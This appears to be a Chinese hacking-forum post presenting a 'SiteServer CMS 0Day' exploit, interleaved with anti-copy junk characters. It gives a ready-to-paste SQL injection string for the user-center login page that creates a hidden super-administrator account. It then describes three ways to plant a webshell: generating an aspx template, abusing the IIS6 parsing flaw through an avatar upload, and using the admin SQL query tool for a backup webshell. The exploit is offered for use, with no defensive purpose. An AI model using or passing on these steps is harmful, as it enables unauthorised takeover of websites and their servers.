SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
, ^4 M2 {$ I( ~4 D2 c, h
, s  \% k! G0 V# }# dstieserver官网:www.siteserver.cn
% M9 f: Z" l8 t6 f9 m
6 j: E+ j5 u. Y1 n

EXP:
" i* W6 R6 U' H) g8 _& I
$ B+ m- N9 N$ ^" `; e1 b$ Y& \直接访问UserCenter/login.aspx

9 y, c0 U: h1 s

用户名处输入：
; G7 c1 B/ r3 q- e% b1 l
" T6 Q3 a7 G0 r& O0 q* w123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
, U+ D% [0 L( J8 `  A; X0 i, I
  Q: A  H: l5 C$ ^, W/ R- ]
* Y$ f3 R, j0 m# [2 W: ]7 z
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
. U" G# ?4 w  i+ v9 E, p' i


之后再访问后台SiteServer/login.aspx用插入的用户登陆

; ]4 A; I+ o$ Y8 y
% T' X* c2 f6 V8 r! {0 K' _! a6 n
后台拿webshell的三种方法：

6 x( e; \% P% M+ j- P6 F  j1 D: z3 `一、
* j* D6 r- d  K4 X/ T
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

- a5 _" I, x' c' x" D7 X成员权限-》添加用户-》用户名为：1.asp
! u. C( {7 E0 |% {* V! R
9 r9 g; y; R; X" yhttp://127.0.0.1/usercenter/
+ R) P$ x& ~9 d) e0 r" B; C
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
4 J' X5 \# Z3 D: [4 v, o
- Y" W6 y1 ?/ @! }, x3 L0 m（ps：后台添加用户时不会验证是否含有非法字符）
! ]9 n0 d+ {5 N1 x* H8 g! A
三、
" S, X1 v2 f, K$ p9 K
9 B; P+ A: z1 P! h- L系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
& ]" A  q, o' @- F" b* }7 s( Q8 V
8 b! a2 _4 }& s6 M- X9 T系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

+ U! a3 w; P: s% P6 p